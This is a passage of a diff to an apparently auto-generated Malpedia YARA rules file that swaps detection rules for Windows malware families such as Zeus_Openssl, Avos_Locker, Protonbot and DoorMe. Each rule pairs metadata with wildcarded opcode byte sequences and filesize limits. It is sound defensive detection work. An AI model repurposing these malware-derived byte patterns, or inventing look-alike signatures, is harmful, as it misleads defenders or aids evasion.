+		$sequence_5 = { c7042401000080 e8???????? c7042410000000 e8???????? }
+		$sequence_6 = { 85c0 750f c705????????05000000 e9???????? c705????????00000000 }
+		$sequence_7 = { 890424 e8???????? eb11 c7042496000000 e8???????? }
+		$sequence_8 = { c744241000000000 c744240c00000000 c744240800000000 c744240400000000 c7042440000000 }
+		$sequence_9 = { a3???????? e9???????? c705????????00000000 e9???????? c7042410020000 }
 
 	condition:
-		7 of them and filesize < 303104
+		7 of them and filesize < 416768
 }
-rule MALPEDIA_Win_Clipog_Auto : FILE
+rule MALPEDIA_Win_Holerun_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "22c07191-4d84-5a13-93be-3e166d55b017"
+		id = "8b68b52e-fb5a-5ecc-88ef-a3ed80a6122b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clipog"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.clipog_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.holerun"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.holerun_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "5f63443ad5edf1c4dcbd4a8d4fd0cdcfd536873049176b0dcfc08c2019029b24"
+		logic_hash = "f543cc584969255e8ee0247544f45390194f0e1121bcb76269aa2fe3a672745b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98280,32 +98386,32 @@ rule MALPEDIA_Win_Clipog_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 736a 488bfb 4c8d358e520100 83e73f 488bf3 48c1fe06 }
-		$sequence_1 = { b910000000 ff15???????? 488b4b18 6685c0 740c 488d15e2e70100 e9???????? }
-		$sequence_2 = { 488bca 4c8d05359e0100 83e13f 488bc2 48c1f806 }
-		$sequence_3 = { 4881ecd0010000 48c7442438feffffff 48899c2410020000 488b05???????? }
-		$sequence_4 = { 8d0480 03c0 8bcf 2bc8 0f841f050000 8d41ff 8b848288d40100 }
-		$sequence_5 = { 48ffc5 ff15???????? 85c0 747d 83bc249000000000 7473 4c8d155a95feff }
-		$sequence_6 = { 488d158ee80100 e9???????? 488d1592e80100 e9???????? 488d1596e80100 e9???????? }
-		$sequence_7 = { 488b41f8 483bc1 7338 482bc8 4883f908 }
-		$sequence_8 = { 488bea 488bf1 4885d2 7515 4533f6 4c8931 488b6c2478 }
-		$sequence_9 = { 7457 48837b1808 48897310 7243 488b0b eb41 4883ff08 }
+		$sequence_0 = { 488d05df640000 890c02 488345f801 48837df81f }
+		$sequence_1 = { 488b05???????? ffd0 c785a8fdffff38000000 31c0 8985acfdffff 488985b0fdffff 488985b8fdffff }
+		$sequence_2 = { 488b05???????? 8b00 83f801 7520 488b15???????? }
+		$sequence_3 = { 4883c420 5d c3 55 4889e5 4883ec40 894d10 }
+		$sequence_4 = { 488b45f8 4801d0 488945f0 488b45f0 8b00 3d50450000 740a }
+		$sequence_5 = { 4801c8 4889c1 488b55b8 488b45a0 4989c9 41b840000000 4889c1 }
+		$sequence_6 = { c744242000000000 41b902000000 4989c8 4889c1 488b05???????? }
+		$sequence_7 = { 4889c2 8b4d10 e8???????? 8945fc }
+		$sequence_8 = { 488b45f0 4883c018 488945e8 488b45e8 }
+		$sequence_9 = { 488d15c1400000 4889c1 e8???????? e9???????? }
 
 	condition:
-		7 of them and filesize < 372736
+		7 of them and filesize < 156672
 }
-rule MALPEDIA_Win_Saint_Bot_Auto : FILE
+rule MALPEDIA_Win_Unidentified_103_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "92ea573f-6995-5968-986f-4f6e838a873b"
+		id = "887a2a34-16c4-5940-84aa-60b8d12f0d1d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.saint_bot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.saint_bot_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_103"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_103_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "8fc12017b3bbd916bf7702bbd87ca92c11f29e697b9a76fb35dc7516e7e5512c"
+		logic_hash = "e05c648365bd2898e5f79fec6ee4b7da15c9961641307154c17359b01f91ade3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98319,32 +98425,32 @@ rule MALPEDIA_Win_Saint_Bot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 668910 8bc1 5d c20c00 55 }
-		$sequence_1 = { 668975d4 8d4508 33f6 c745b418000000 683f000f00 50 }
-		$sequence_2 = { 8d45f4 50 8d85ecefffff 50 }
-		$sequence_3 = { 83650800 8bf8 56 c745ec64000000 }
-		$sequence_4 = { c1f808 8847ff 807a013d 7402 880f 83c204 83c703 }
-		$sequence_5 = { 894dd8 894ddc ff15???????? ff75f8 e8???????? 59 03c0 }
-		$sequence_6 = { e8???????? 59 59 85c0 741f 6a00 53 }
-		$sequence_7 = { 53 8945dc e8???????? 8bd8 83c434 8b45fc 85db }
-		$sequence_8 = { 58 6a72 668945ba 58 6a49 668945bc }
-		$sequence_9 = { 59 59 85c0 7515 ff75f0 8d8544f0ffff }
+		$sequence_0 = { 896c2408 89442440 8b842434010000 895c2410 8944243c 8b842490000000 89442438 }
+		$sequence_1 = { 8b842490000000 ffd0 897c2408 890424 8b8424a8000000 c744240400000000 ffd0 }
+		$sequence_2 = { 57 56 53 83ec5c 8b5c2474 8bac2488000000 8bb4248c000000 }
+		$sequence_3 = { 890424 8b842414010000 ffd0 83ec10 }
+		$sequence_4 = { ffd0 83ec0c 85c0 7417 890424 8b8424f0000000 c744240400000000 }
+		$sequence_5 = { ffd5 c744240400000000 890424 89742408 ffd7 83ec0c 85db }
+		$sequence_6 = { 885c242c 8b4c2434 01ea 0fb61c01 885c0204 83c001 83f808 }
+		$sequence_7 = { 890424 8b8424f0000000 ffd0 83ec08 8b8424b4000000 }
+		$sequence_8 = { 8d7240 8944245c 8dbc248c000000 89442404 897c2408 893424 }
+		$sequence_9 = { 31c0 803a00 7415 90 8d742600 83c001 803c0200 }
 
 	condition:
-		7 of them and filesize < 93184
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Invisimole_Auto : FILE
+rule MALPEDIA_Win_Protonbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "55a375db-e677-582e-bce8-b3a68908eaf5"
+		id = "8cdc823c-c8c1-58ea-8d03-57dbf9ef2cfb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.invisimole_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.protonbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.protonbot_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "8f39140cf09da2962c64c906a5e356fe5a001c88884a167cc322923fa7d9bdf4"
+		logic_hash = "1da2c73b33dd64c5d5bd2696d510d134f1603c96fce2824c4a93e6a826735bf1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98358,32 +98464,32 @@ rule MALPEDIA_Win_Invisimole_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 33c9 57 66890b ff15???????? 6a10 6a00 }
-		$sequence_1 = { 8d4de4 51 8d88980f0000 51 c745eca8a94000 8955f0 c745f41e000000 }
-		$sequence_2 = { ff15???????? 8b55f4 53 33c9 52 66890f }
-		$sequence_3 = { 8bc1 0f848e110000 8d4dc8 51 8d75fc e8???????? 8bf0 }
-		$sequence_4 = { 8b7d8c 85ff 7450 33f6 3975ac 7628 83c704 }
-		$sequence_5 = { c645bc0d 668955bd 894dbf 8bde 7409 83c302 66833b2a }
-		$sequence_6 = { e8???????? 0fb64636 6a01 8d4dff 51 57 8845ff }
-		$sequence_7 = { c7464c00000080 c703ffffffff c6466c00 ff15???????? 8d55f0 52 }
-		$sequence_8 = { 53 56 ff15???????? 85c0 0f8595000000 3975fc 0f848c000000 }
-		$sequence_9 = { ff15???????? 8b4c2414 668944cf04 8b44241c 41 }
+		$sequence_0 = { 8bc6 8b8c24b4010000 5e 33cc }
+		$sequence_1 = { 8b00 a3???????? 8d4520 0f434520 50 e8???????? 83c404 }
+		$sequence_2 = { 83c404 8b07 ffd0 e8???????? 6a04 57 }
+		$sequence_3 = { 0f434520 50 e8???????? 83c404 50 }
+		$sequence_4 = { 8d85d8feffff 0f4385d8feffff 50 8d85f0feffff }
+		$sequence_5 = { 6804010000 8d85ecfeffff c645fc02 50 6a00 ff15???????? 8d8decfeffff }
+		$sequence_6 = { 899df8fffeff e8???????? 83c410 8bf8 89bdf4fffeff }
+		$sequence_7 = { 8d85bcfeffff 83bdd0feffff10 8d8da4feffff 0f4385bcfeffff }
+		$sequence_8 = { a1???????? 33c4 898424b0010000 56 6a00 8d44240c }
+		$sequence_9 = { 56 8b35???????? ffd6 ffb5c0f7ffff ffd6 }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 1073152
 }
-rule MALPEDIA_Win_Fireball_Auto : FILE
+rule MALPEDIA_Win_Project_Wood_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "56483242-91cf-583e-a311-f81ca06ce35e"
+		id = "eadfb598-e06d-536a-8983-e068733d6495"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fireball_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.project_wood"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.project_wood_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "c7846c89fcbe1ab5b4465cca84b35feb748c18b2402533bbb31c4b86c78dbc99"
+		logic_hash = "92c5f7de9849db3abd82c6a5e3e8ba38f7353d944f46cacae8fc567f574f0ddc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98397,32 +98503,32 @@ rule MALPEDIA_Win_Fireball_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 c785b8f6ffff40000000 ff15???????? 85c0 7410 8d45a8 }
-		$sequence_1 = { 83e61f c1e606 033485000a2500 837e0800 }
-		$sequence_2 = { 8d8d04f7ffff e8???????? 8d8dd4f6ffff e8???????? 8d8d88f6ffff e8???????? }
-		$sequence_3 = { e9???????? 8d8d38f5ffff e9???????? 8d8da0f6ffff e9???????? 8d8d80f5ffff e9???????? }
-		$sequence_4 = { 83c404 8b4c2470 64890d00000000 59 5e }
-		$sequence_5 = { 0f4275e8 85f6 0f8598000000 33c0 85c0 7514 }
-		$sequence_6 = { e8???????? 59 59 8b7d08 833cfda8f5240000 755b 6a18 }
-		$sequence_7 = { 51 6af6 ff15???????? 8b04bd000a2500 }
-		$sequence_8 = { 59 8365fc00 8b049d000a2500 f644380401 7413 ff7510 ff750c }
-		$sequence_9 = { 0f94c0 5d c3 56 33f6 ffb6c8f62400 }
+		$sequence_0 = { 68???????? eb0e 83bd18ffffff01 7513 68???????? 8d86ad000000 }
+		$sequence_1 = { 8bf8 8d45cc 57 897de4 ff75e0 56 53 }
+		$sequence_2 = { 50 ff15???????? a810 0f8526010000 8d45d8 50 }
+		$sequence_3 = { a1???????? 33c9 40 8acf 3bc6 88887f5fe810 a3???????? }
+		$sequence_4 = { 50 ff7508 e8???????? 83c41c 33c0 8dbdedfeffff 889decfeffff }
+		$sequence_5 = { 50 e8???????? 68???????? e8???????? 40 68???????? 018614090000 }
+		$sequence_6 = { e8???????? 8b4de0 b8a3010000 83c40c 3bc8 0f87c8000000 0f84ae000000 }
+		$sequence_7 = { 8d85c8fcffff 68???????? 50 ff15???????? 83c410 8d45ec }
+		$sequence_8 = { 50 e8???????? 68???????? e8???????? 01861c090000 8b861c090000 8d8de8fcffff }
+		$sequence_9 = { 56 e8???????? 83c448 8d45e4 6a14 53 50 }
 
 	condition:
-		7 of them and filesize < 335872
+		7 of them and filesize < 31137792
 }
-rule MALPEDIA_Win_Erebus_Auto : FILE
+rule MALPEDIA_Win_Zeus_Openssl_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bb1eb465-4db1-53de-8a86-97595b0c4304"
+		id = "550619dc-6f15-5f3b-ac49-6d6bb9526626"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.erebus_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zeus_openssl_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "f2c3fac68e77b34a8cb144aa7557b3180cfb2d2c5f88070b47f30c977edf0360"
+		logic_hash = "ad90787c109d806e4177874e3ce46219d993226aadc9cde55e3f2e9866998d97"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98436,32 +98542,32 @@ rule MALPEDIA_Win_Erebus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 75e4 33c0 8b54242c 33c9 85c0 8bfb 0f4ff9 }
-		$sequence_1 = { 55 56 57 8b7308 8b430c 895c241c 85f6 }
-		$sequence_2 = { 33c0 c744243007000000 8d146b c744242c00000000 668944241c 663902 }
-		$sequence_3 = { 8b0f 8b4704 2bc1 55 83e0fc 50 51 }
-		$sequence_4 = { 03ff 8b0485b86f5200 894c1830 8b45f0 8b5de8 3b450c }
-		$sequence_5 = { 8da42400000000 833d????????00 750f e8???????? c705????????c0474400 b902000000 c7442430043a5000 }
-		$sequence_6 = { 68???????? 8d4dd8 e8???????? 50 6a00 8d45a8 }
-		$sequence_7 = { c744245c00000000 e8???????? 8b54242c 33c0 8b5c2430 8bca 8bfb }
-		$sequence_8 = { 0bd7 890cc5d07a5200 8914c5d47a5200 40 3d00010000 7cb2 0f57c0 }
-		$sequence_9 = { 7405 2bea 896b10 8b4c2440 64890d00000000 59 }
+		$sequence_0 = { 8981bc160000 8b4108 881c02 ff4114 }
+		$sequence_1 = { 8945dc 0f855fffffff 85db 0f84d5000000 8d5eff 81c69e050000 8d3c71 }
+		$sequence_2 = { 0fb600 8bcf d3e0 8d4f08 03d0 8b45f8 40 }
+		$sequence_3 = { b801000000 d3e0 8b4df4 48 23c2 014140 }
+		$sequence_4 = { 8bc8 d3ea 8b4df4 2bf0 0181c41b0000 8955f8 8b4140 }
+		$sequence_5 = { 894df8 8b88bc160000 8bd6 2b55f8 }
+		$sequence_6 = { 8b8570ffffff 2bda 8d0c81 894dac 8955b4 b801000000 }
+		$sequence_7 = { c20400 56 8bf1 8a06 84c0 740c }
+		$sequence_8 = { 884dff 8a0c07 884dfe 8b4df0 8db002010000 3bb98c000000 7209 }
+		$sequence_9 = { 8b4708 894710 8b06 83781000 0f849c010000 8b5dfc 8b7e5c }
 
 	condition:
-		7 of them and filesize < 2564096
+		7 of them and filesize < 4546560
 }
-rule MALPEDIA_Win_Bravonc_Auto : FILE
+rule MALPEDIA_Win_Avos_Locker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "46ca6b44-3777-5a69-8397-e443ebcbbb5c"
+		id = "9aee42e1-3c32-52f2-9afa-ee2f50391d41"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bravonc_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.avos_locker_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "c173b555e387356384c480cbe1258c67f0fa737efd2cf0efcccd2c272e1e677f"
+		logic_hash = "a821f2b32080b52bc69d3070def6e8f696a536519430ac8aacf9142d4b2280c1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98475,32 +98581,32 @@ rule MALPEDIA_Win_Bravonc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a1???????? 6a06 68???????? 50 ffd6 83c40c 85c0 }
-		$sequence_1 = { 034a24 034dfc 8d8401d6c162ca 8945fc }
-		$sequence_2 = { 56 8d85fcfeffff 56 50 ff750c 56 e8???????? }
-		$sequence_3 = { 8d45c8 68???????? 50 8d85e4feffff 50 e8???????? 83c40c }
-		$sequence_4 = { 59 33c0 8d7db0 895dac c645fc01 895df0 }
-		$sequence_5 = { 8bf1 57 8b7d0c 8b460c 8d0c38 3b4e08 }
-		$sequence_6 = { 66897004 5f 5e 668908 66895006 5b c9 }
-		$sequence_7 = { ff15???????? 59 3bc3 59 7404 802000 }
-		$sequence_8 = { 51 b85c120000 e8???????? 53 56 57 }
-		$sequence_9 = { 59 8d7db0 6a10 c745ac44000000 59 895df0 f3ab }
+		$sequence_0 = { 8d85a8f9ffff 50 8d85fcf5ffff 50 8d8514f6ffff 50 83ec18 }
+		$sequence_1 = { 57 8b4d18 85c9 743f 8b4514 3bd9 8b7c2424 }
+		$sequence_2 = { 8d4dc0 e8???????? 8b4df4 64890d00000000 59 5e 8be5 }
+		$sequence_3 = { e8???????? 3b750c 0f8469020000 8b8d54ffffff e9???????? 47 3b7d94 }
+		$sequence_4 = { 2bc6 c1f803 50 e8???????? 895df0 c645fc02 8b13 }
+		$sequence_5 = { 2b4b4c 2b534c 3bd1 8b4c240c 5f 5e 0f9cc0 }
+		$sequence_6 = { c70300000000 c7430400000000 c7430800000000 8b10 8b4804 8945e4 8955e8 }
+		$sequence_7 = { b908000000 894e44 8b0e 8b7e08 3bcf 0f840d010000 80395c }
+		$sequence_8 = { ff75e4 ff75e0 8b01 ff500c 8b55e4 8b75e0 2bd6 }
+		$sequence_9 = { 894e30 c645fc02 8d4dbc e8???????? c745fcffffffff 8bc6 8b4df4 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 1701888
 }
-rule MALPEDIA_Win_Orcarat_Auto : FILE
+rule MALPEDIA_Win_Cueisfry_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "66428b7d-391a-549a-8224-a32cd382ad2d"
+		id = "3f94f63a-bd01-5ab8-af5f-ba8550248461"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.orcarat_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cueisfry_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "5f94f67164edef88389c383016b172885e074830b2ead0db2794d29f7191cd25"
+		logic_hash = "fe662cbb30073bd6bd4ed92effaa065add48a5ad78c3a6b1fdab8c2e82a82aba"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98514,34 +98620,34 @@ rule MALPEDIA_Win_Orcarat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b9424401d0000 83c9ff 8bfa 33c0 f2ae f7d1 89442410 }
-		$sequence_1 = { 03c8 8d148d7ca04000 8bcd 52 }
-		$sequence_2 = { f7d1 2bf9 81c575020000 8bc1 }
-		$sequence_3 = { f2ae 8d542410 8d8424385a0000 f7d1 52 50 894c241c }
-		$sequence_4 = { 50 8d442414 49 50 51 52 53 }
-		$sequence_5 = { 50 894c241c 51 8d4c242c c744241c00080000 51 }
-		$sequence_6 = { 6a0a 52 6aff e8???????? 8d7c2428 83c9ff }
-		$sequence_7 = { c21800 8b8c242c080000 55 55 }
-		$sequence_8 = { 8d0c2e 50 51 e8???????? 8b54242c 83c418 03d6 }
-		$sequence_9 = { 740b 83f801 75dd 396c2410 75d7 bf???????? 83c9ff }
+		$sequence_0 = { 8b44241c c1e308 0bdf 8b542438 }
+		$sequence_1 = { 897dfc 57 897dd8 c645fc01 ff15???????? 8d4dec }
+		$sequence_2 = { 6803400080 e8???????? 8b45ec 8b08 50 ff5108 897dec }
+		$sequence_3 = { 0f95c0 84c0 7508 83c8ff e9???????? 8b2d???????? 33f6 }
+		$sequence_4 = { f3a5 50 e8???????? 8d4c2424 51 e8???????? }
+		$sequence_5 = { ff15???????? 8bcf 8be8 8bd1 33c0 8bfd }
+		$sequence_6 = { b910000000 8d7c241c f3a5 8d4c241c 68???????? }
+		$sequence_7 = { 50 8d442434 6a01 50 ffd7 56 }
+		$sequence_8 = { 85c0 0f95c0 be???????? 8dbc24b0010000 84c0 f3a5 }
+		$sequence_9 = { 83c40c 53 ff15???????? 68???????? e8???????? 83c404 }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Jaku_Auto : FILE
+rule MALPEDIA_Win_Meltingclaw_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0112e8e2-bdef-5365-8ac6-db0d7a5331a7"
+		id = "3b6f1fa7-265c-5ffe-9d34-c9502295b009"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jaku_auto.yar#L1-L267"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meltingclaw"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.meltingclaw_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "48ece9688342db3652fd3070c7f85ee33a0b73ea4b91e59fc03cc271dad9fdd8"
+		logic_hash = "379103784a97b527734f31e44cda4d460b2bdbd8572feff4730fa002535654cf"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -98552,52 +98658,33 @@ rule MALPEDIA_Win_Jaku_Auto : FILE
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
-	strings:
-		$sequence_0 = { ff75f0 ff75fc ff7618 e8???????? 83c40c }
-		$sequence_1 = { 83ff10 7321 837df800 0f84610e0000 8b45fc ff4df8 }
-		$sequence_2 = { 5e c3 833d????????00 56 8b742408 7505 e8???????? }
-		$sequence_3 = { 66891441 ff4e78 75b6 ff466c 8b466c 3beb }
-		$sequence_4 = { d3e2 8b4de4 85d1 7404 d1ea ebf8 }
-		$sequence_5 = { 894dcc 750c 81fa54030000 0f8316020000 83ff02 }
-		$sequence_6 = { 83c418 33db 894618 895df4 c70601000000 e9???????? }
-		$sequence_7 = { 5b 8bd3 3bc3 8955ec }
-		$sequence_8 = { 68???????? ff15???????? c3 b8???????? e8???????? 83ec2c }
-		$sequence_9 = { ff742408 e8???????? c20800 8bc1 }
-		$sequence_10 = { 5b c3 55 8bec 833d????????00 53 56 }
-		$sequence_11 = { 6a01 03c3 68???????? 50 e8???????? 83c40c }
-		$sequence_12 = { 53 68000000a0 6a03 53 }
-		$sequence_13 = { 7507 b800308000 eb02 33c0 }
-		$sequence_14 = { 55 56 57 6880020000 }
-		$sequence_15 = { 7508 83c8ff e9???????? 8b839f830000 }
-		$sequence_16 = { 75dd 57 e8???????? 59 }
-		$sequence_17 = { 85ff 741b 3bd0 7f74 7508 8b442418 }
-		$sequence_18 = { e8???????? 59 eb57 53 }
-		$sequence_19 = { 0245fd 3245fe 8a4dff d2c8 }
-		$sequence_20 = { 56 e8???????? 59 8b4620 }
-		$sequence_21 = { 50 e8???????? 59 8b4e2c }
-		$sequence_22 = { 016c242c 8b44242c 5f 5e 5d }
-		$sequence_23 = { 2b4d08 3bf1 770a 68???????? e8???????? 034d14 2b4508 }
-		$sequence_24 = { 66d3e2 02c3 888677830000 66099675830000 }
-		$sequence_25 = { 85c0 743a 6a58 e8???????? 59 }
-		$sequence_26 = { 51 6800040000 ff750c 50 ff15???????? 85c0 7527 }
-		$sequence_27 = { 6a00 66c745903c00 50 e8???????? }
-		$sequence_28 = { 6a00 57 e8???????? 8945fc }
+	strings:
+		$sequence_0 = { 488d8da8000000 48ffc9 48ffc1 803900 75f8 4c8d4590 33d2 }
+		$sequence_1 = { 4c8b0a 33f6 448bc6 48c7420816000000 4c8bd2 48c7421009000000 488bf9 }
+		$sequence_2 = { 7424 83ea01 7412 83fa01 7562 }
+		$sequence_3 = { 0fb74c4420 6643890c46 49ffc0 4983f80a 72b0 488b8c2420020000 4833cc }
+		$sequence_4 = { 49c706212a0100 488906 410fbec2 6bc83f 49c70700010000 80c121 418809 }
+		$sequence_5 = { 85c0 78d6 3de4000000 73cf 4803c0 418b84c790bd0100 ebc4 }
+		$sequence_6 = { 0fb6c0 0fb74c4420 6643890c46 49ffc0 4983f80e 72b0 488b8c2420020000 }
+		$sequence_7 = { 7508 48396930 b001 7403 408ac5 }
+		$sequence_8 = { 72e8 41881c39 49ffc1 4983f94c 72af 488b5c2408 }
+		$sequence_9 = { d3e8 4d894708 41894718 410fb608 83e10f 480fbe841140960100 }
 
 	condition:
-		7 of them and filesize < 2220032
+		7 of them and filesize < 348160
 }
-rule MALPEDIA_Win_Pngdowner_Auto : FILE
+rule MALPEDIA_Win_Doorme_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "44303c5d-967e-534a-8e83-5300065e2ae0"
+		id = "ef34215c-21dc-5b70-9e46-024fa7a7faa3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pngdowner_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.doorme_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "de22eb663da7ff55693bb983ea5d4c7de5d0a56ea6d44ddf300552a98f59e1cb"
+		logic_hash = "7a262e46ac547aa0a1d170d6c95f7394f8a304e152ade6a1fdc4d6407588a287"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98611,32 +98698,32 @@ rule MALPEDIA_Win_Pngdowner_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { aa 8d9ec8dc4000 803b00 8bcb }
-		$sequence_1 = { 83c404 83c8ff 5f 5e 5d 5b 81c45c010000 }
-		$sequence_2 = { 51 ff15???????? 8bf8 83ffff 751a }
-		$sequence_3 = { 6a00 51 8d542438 50 52 }
-		$sequence_4 = { 7419 0fb6da f68301e5400004 7406 }
-		$sequence_5 = { f3a4 8b442410 8b4c2414 43 3bd9 0f82eefeffff 50 }
-		$sequence_6 = { 83e01f c1f905 8d04c0 be00800000 8b0c8d40e64000 8d548104 8a4c8104 }
-		$sequence_7 = { 85c0 7556 b920000000 8dbc2498010000 f3ab b920000000 }
-		$sequence_8 = { 83e00f 45 8a4c840c 884c2eff c6042e3d c6442e0100 5e }
-		$sequence_9 = { 83651003 8bf0 750b c1e602 8b8640dc4000 }
+		$sequence_0 = { 4180f04b 4488442434 4180f14b 44884c2435 4180f24b 4488542436 44885c2437 }
+		$sequence_1 = { 0f87c8010000 e8???????? 660f6f05???????? f30f7f442450 c644244000 488b542438 4883fa10 }
+		$sequence_2 = { 4a8d0432 488bd9 483bc8 480f42d8 488bc3 48897c2458 4883c001 }
+		$sequence_3 = { 4883c428 e9???????? 83f808 7d14 488d0c80 488d05f03d0300 488d0cc8 }
